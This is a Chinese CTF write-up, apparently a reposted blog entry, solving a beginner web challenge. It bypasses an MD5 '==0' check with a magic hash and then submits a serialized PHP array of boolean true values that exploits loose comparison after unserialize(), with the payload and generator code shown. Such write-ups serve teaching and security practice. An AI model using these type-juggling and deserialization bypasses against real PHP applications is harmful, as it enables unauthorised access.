zoukankan      html  css  js  c++  java
  • CTF最简单的Web题

    http://www.shiyanbar.com/ctf/1810

    天网管理系统
    天网你敢来挑战嘛
    格式:ctf{ }
    解题链接: http://ctf5.shiyanbar.com/10/web1

    查看源代码发现提示<!-- $test=$_GET['username']; $test=md5($test); if($test=='0') -->

    md5($test) = ‘0’ 

    百度0开头的md5值,随便拿一个带进username用就OK了。 

    得到一个提示:

    /user.php?fame=hjkleffifer
    

     进入  http://ctf5.shiyanbar.com/10/web1/user.php?fame=hjkleffifer

    $unserialize_str = $_POST['password']; 
    $data_unserialize = unserialize($unserialize_str); 
    if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???') 
    { print_r($flag); } 
    伟大的科学家php方言道:成也布尔,败也布尔。 回去吧骚年
    把复杂的数据类型压缩到一个字符串中
    serialize() 把变量和它们的值编码成文本形式
    unserialize() 恢复原先变量
     弱类型,bool的true和任意字符串弱类型相等,所以构造的user(bool)和password(bool)的值为true即可。
    <?php
    $payload = array('user'=>true,'pass' => true);
    echo serialize($payload);
    ?>
    

      得到

    a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

     user:admin

    password: a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

     得到

    ctf{dwduwkhduw5465}

  • 相关阅读:
    ElasticSearch 高级DSL查询语句
    docker改国内官方镜像
    step1: python & scrapy安装
    step7: 输出到json文件
    step6: item与pipeline
    step5: 编写spider爬取
    step4: Xpath的使用
    step3: 创建jobbole爬虫
    step2: 爬取廖雪峰博客
    解决WAS更新web.xml文件不生效的问题(web_merged.xml是罪魁祸首)
  • 原文地址:https://www.cnblogs.com/levelstrcpy/p/9210333.html
Copyright © 2011-2022 走看看